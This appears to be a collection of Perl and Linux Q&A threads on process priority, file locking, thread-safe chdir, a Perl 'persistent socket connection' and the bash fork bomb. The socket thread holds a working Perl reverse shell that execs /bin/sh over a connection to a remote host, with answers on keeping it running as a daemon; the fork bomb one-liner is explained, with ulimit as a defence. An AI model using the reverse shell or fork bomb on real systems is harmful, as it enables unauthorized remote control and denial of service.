Running OS functions with modified scheduling priority in Perl - Linux

Is it possible to have Perl run a Linux OS function with a modified scheduling and/or IO scheduling priority without external commands? I am trying to simulate the following:
nice -n19 ionice -c2 -n7 cp largefile largefile2
Can I somehow do this with File::Copy, the setpriority function, and the CPAN module Linux::IO_Prio? Would I just need to lower the scheduling priority of $0?
EDIT:
If I do the following will the priority and IO be lowered for copy()? Is there a better way to do this?
use Linux::IO_Prio qw(:all);
use File::Copy;
setpriority(0, 0, 19); # 0 = PRIO_PROCESS, 0 = current process; 19 = lowest priority (-20 would be the highest, not the lowest)
ionice(IOPRIO_WHO_PROCESS, $$, IOPRIO_CLASS_IDLE, 7);
copy("file1","file2") or die "Copy failed: $!";

Refining Oesor’s answer:
use BSD::Resource qw(PRIO_PROCESS setpriority);
use Linux::IO_Prio qw(IOPRIO_WHO_PROCESS IOPRIO_PRIO_VALUE IOPRIO_CLASS_BE ioprio_set);
BEGIN { require autodie::hints; autodie::hints->set_hints_for(\&ioprio_set, { fail => sub { $_[0] == -1 } } ) };
use autodie qw(:all setpriority ioprio_set);
setpriority(
    PRIO_PROCESS,   # 1
    $$,
    19
);
ioprio_set(
    IOPRIO_WHO_PROCESS,   # 1
    $$,
    IOPRIO_PRIO_VALUE(IOPRIO_CLASS_BE, 7)   # 0x4007
);
By the way, you can find out which library and system calls a command like nice or ionice makes by running it under strace.

You're probably best off simply changing the priority of the currently running PID as needed. Not portable, of course, but the task is inherently non-portable: anything that does this will ultimately make the same library calls the external commands do.
my $pid = $$;
`ionice -c2 -p$pid`;
`renice +19 $pid`;
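To verify that both changes took effect, you can read the values back; a quick illustrative check, assuming util-linux's ionice and a procps-style ps are installed:
print `ionice -p $pid`;       # e.g. "best-effort: prio 7"
print `ps -o ni= -p $pid`;    # prints the nice value, e.g. "19"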

Related

How can I create a persistent socket connection in Perl?

I'm learning Perl and I have two Linux systems (server/client). I want to connect them via Perl with a reverse socket connection.
The way I do it is with this command on the server side:
perl -e 'use Socket;
$i="**iphere**";
$p=**porthere**;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
};'
This works fine, but I want to make the connection persistent over time, perhaps by executing the script again after a delay.
The server system is CentOS.
Any idea?
Well, step one would be to take your command-line script and turn it into a real program. Put it in a file called my_server and reformat it like this (to make it easier to maintain).
use Socket;
$i = "**iphere**";
$p = **porthere**;
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
if (connect(S, sockaddr_in($p, inet_aton($i)))) {
    open(STDIN, ">&S");
    open(STDOUT, ">&S");
    open(STDERR, ">&S");
    exec("/bin/sh -i");
}
You can now run that by typing perl my_server at the command line. We can make it look more like a command by adding a shebang line and making it executable. At this point I'm also going to add Perl's safety nets, use strict and use warnings (which you should always have in your Perl code), and they will require us to define our variables with my.
#!/usr/bin/env perl
use strict;
use warnings;
use Socket;
my $i = "**iphere**";
my $p = **porthere**;
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
if (connect(S, sockaddr_in($p, inet_aton($i)))) {
    open(STDIN, ">&S");
    open(STDOUT, ">&S");
    open(STDERR, ">&S");
    exec("/bin/sh -i");
}
If we make that executable (chmod +x my_server), we can run it by just typing the program's name (my_server) on the command line.
The next step would be to make it into a proper service which you can start, stop and monitor using your OS's native service capabilities. I don't have time to get into that in detail, but I'd be looking at Daemon::Control.
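As a rough illustration, a minimal Daemon::Control wrapper could look like the sketch below; the service name and file paths are assumptions, so adjust them for your system. Saved as, say, my_server_ctl, it gives you my_server_ctl start, stop and status commands:
#!/usr/bin/env perl
use strict;
use warnings;
use Daemon::Control;

# Hypothetical paths - adjust for your installation.
exit Daemon::Control->new(
    name        => 'my_server',
    program     => '/usr/local/bin/my_server',
    pid_file    => '/var/run/my_server.pid',
    stdout_file => '/var/log/my_server.out',
    stderr_file => '/var/log/my_server.err',
)->run;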
You're using old-school, C-like socket programming in Perl, which works, but remember: it's Perl. To make the code more readable and less complex, you can always use IO::Socket. Also, in a production environment, I would recommend adding the server IPs to /etc/hosts and using host names instead of raw IPs.
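For instance, a rough IO::Socket::INET equivalent of the question's script might look like this (the **iphere**/**porthere** placeholders are kept from the question):
use strict;
use warnings;
use IO::Socket::INET;

my $sock = IO::Socket::INET->new(
    PeerAddr => "**iphere**",
    PeerPort => "**porthere**",
    Proto    => 'tcp',
) or die "Cannot connect: $!";

# Duplicate the socket onto the standard streams, then hand off to a shell.
open(STDIN,  ">&", $sock);
open(STDOUT, ">&", $sock);
open(STDERR, ">&", $sock);
exec("/bin/sh -i");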

Unknown bash command causing PC to freeze [duplicate]

I looked at this page and can't understand how this works.
This command "exponentially spawns subprocesses until your box locks up".
But why? What I understand less are the colons.
user@host$ :(){ :|:& };:
:(){ :|:& };:
...defines a function named :, which spawns itself twice (one copy pipes into the other) and backgrounds itself.
With line breaks:
:()
{
:|:&
};
:
Renaming the : function to forkbomb:
forkbomb()
{
forkbomb | forkbomb &
};
forkbomb
You can prevent such attacks by using ulimit to limit the number of processes per user:
$ ulimit -u 50
$ :(){ :|:& };:
-bash: fork: Resource temporarily unavailable
$
More permanently, you can use /etc/security/limits.conf (on Debian and others, at least), for example:
* hard nproc 50
Of course, that means you can only run 50 processes; you may want to increase this depending on what the machine is doing!
That defines a function called : which calls itself twice (Code: : | :). It does that in the background (&). After the ; the function definition is done and the function : gets started.
So every instance of : starts two new : and so on... Like a binary tree of processes...
Written in plain C that is:
fork();
fork();
To add to the above answers: the pipe | creates two processes at once and connects them (the pipe itself is implemented by the operating system), so each invocation spawns two more processes. That is what makes resource usage grow exponentially and exhaust the system so quickly. The & backgrounds each process, so the prompt returns immediately and the next call starts even sooner.
Conclusion:
|: consumes system resources faster (exponential growth)
&: backgrounds the process so each new one starts faster
This defines a function called : (:()). Inside the function ({...}), there's a :|:& which is like this:
: calls this : function again.
| signifies piping the output to a command.
: after | means pipe to the function :.
&, in this case, means run the preceding in the background.
Then there's a ; that is known as a command separator.
Finally, the : starts this "chain reaction", activating the fork bomb.
The C equivalent would be:
#include <sys/types.h>
#include <unistd.h>
int main()
{
fork();
fork();
}

Why is File::FcntlLock's l_type always "F_UNLCK" even if the file is locked?

The Perl subroutine below uses File::FcntlLock to check if a file is locked.
Why does it return 0 and print /tmp/test.pid is unlocked. even if the file is locked?
sub getPidOwningLock {
    my $filename = shift;

    my $fs = File::FcntlLock->new();
    $fs->l_type( F_WRLCK );
    $fs->l_whence( SEEK_SET );
    $fs->l_start( 0 );
    $fs->l_len( 0 );

    my $fd;
    if ( !open( $fd, '+<', $filename ) ) {
        print "Could not open $filename\n";
        return -1;
    }
    if ( !$fs->lock( $fd, F_GETLK ) ) {
        print "Could not get lock information on $filename, error: " . $fs->error . "\n";
        close($fd);
        return -1;
    }
    close($fd);

    if ( $fs->l_type() == F_UNLCK ) {
        print "$filename is unlocked.\n";
        return 0;
    }
    return $fs->l_pid();
}
The file is locked as follows (lock.sh):
#!/bin/sh
(
    flock -n 200
    while true; do sleep 1; done
) 200>/tmp/test.pid
The file is indeed locked:
~$ ./lock.sh &
[2] 16803
~$ lsof /tmp/test.pid
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
bash 26002 admin 200w REG 8,5 0 584649 test.pid
sleep 26432 admin 200w REG 8,5 0 584649 test.pid
fcntl and flock locks are invisible to each other.
This is a big problem for your use case because the flock utility that you're using in your shell script depends on flock semantics: the shell script runs a flock child process, which locks an inherited file descriptor and then exits. The shell keeps that file descriptor open (because the redirection is on a whole sequence of commands) until it wants to release the lock.
That plan can't work with fcntl, because fcntl locks belong to a single process and aren't inherited or shared across processes. If there were a utility identical to flock but using fcntl, the lock would be released too early (as soon as the child process exits).
For coordination of a file lock between a perl process and a shell script, some options you can consider are:
port the shell script to zsh and use the zsystem flock builtin from the zsh/system module (note: in the documentation it claims to use fcntl in spite of its name being flock)
rewrite the shell script in perl
just use flock in the perl script (giving up byte-range locking and the "get locker PID" feature - though you can emulate the latter on Linux by reading /proc/locks); a minimal sketch appears at the end of this answer
write your own fcntl utility in C for use in the shell script (the usage pattern will be different - the shell script will have to background it and then kill it later to unlock - and it will need some way to tell the parent process when it has obtained or failed to obtain the lock, which will be hard because it's happening asynchronously now... maybe use the coprocess feature that some shells have).
run a small perl script from the shell script to do the locking (will need the same background treatment that a dedicated fcntl utility would need)
For more information on features of the different kinds of locks, see What is the difference between locking with fcntl and flock.
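For the third option, here is a minimal sketch of flock-based checking on the Perl side (the file name is taken from the question; the rest is illustrative):
use strict;
use warnings;
use Fcntl qw(:flock);    # LOCK_SH, LOCK_EX, LOCK_NB, LOCK_UN

open(my $fh, '>>', '/tmp/test.pid') or die "open: $!";
if (flock($fh, LOCK_EX | LOCK_NB)) {
    print "/tmp/test.pid is unlocked (we just acquired the lock).\n";
    flock($fh, LOCK_UN);
} else {
    print "/tmp/test.pid is locked by another process.\n";
    # flock gives no portable way to learn the locker's PID; on Linux
    # you can match this file's device/inode numbers in /proc/locks.
}
close($fh);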

How can I change the current directory in a thread-safe manner in Perl?

I'm using Thread::Pool::Simple to create a few worker threads. Each worker thread does some stuff, including a call to chdir followed by the execution of an external Perl script (from the jbrowse genome browser, if it matters). I use capturex (from IPC::System::Simple) to call the external script and die on its failure.
I discovered that when I use more than one thread, things start to get messy. After some research, it seems that the current directory of some threads is not the correct one.
Perhaps chdir propagates between threads (i.e. isn't thread-safe)?
Or perhaps it's something with capturex?
So, how can I safely set the working directory for each thread?
** UPDATE **
Following the suggestions to change directory while executing, how exactly should I pass these two commands to capturex? Currently I have:
my @args = ( "bin/flatfile-to-json.pl", "--gff=$gff_file", "--tracklabel=$track_label", "--key=$key", @optional_args );
capturex( [0], @args );
How do I add another command to @args?
Will capturex still die on errors from any of the commands?
I think that you can solve your "how do I chdir in the child before running the command" problem pretty easily by abandoning IPC::System::Simple as not the right tool for the job.
Instead of doing
my $output = capturex($cmd, @args);
do something like:
use autodie qw(open close);

my $pid = open my $fh, '-|';
unless ($pid) {    # this is the child
    chdir($wherever);
    exec($cmd, @args) or exit 255;
}
my $output = do { local $/; <$fh> };

# If the child exited with an error or couldn't be run, the exception
# will be raised here (via autodie; feel free to replace it with your
# own handling).
close($fh);
If you were getting a list of lines instead of scalar output from capturex, the only thing that needs to change is the line that reads from $fh (to my @output = <$fh>;).
More info on forking-open is in perldoc perlipc.
The good thing about this, in preference to capture("chdir wherever ; $cmd @args"), is that it doesn't give the shell a chance to do bad things to your @args.
Updated code (doesn't capture output)
my $pid = fork;
die "Couldn't fork: $!" unless defined $pid;
unless ($pid) {    # this is the child
    chdir($wherever);
    open STDOUT, ">/dev/null";    # optional: silence subprocess output
    open STDERR, ">/dev/null";    # even more optional
    exec($cmd, @args) or exit 255;
}
wait;
die "Child error $?" if $?;
Indeed, the current working directory is not a per-thread property: it's a property of the process, shared by all threads, so a chdir in one thread changes it for every thread.
It's not clear exactly why you need to use chdir at all though. Can you not launch the external script setting the new process's working directory appropriately instead? That sounds like a more feasible approach.
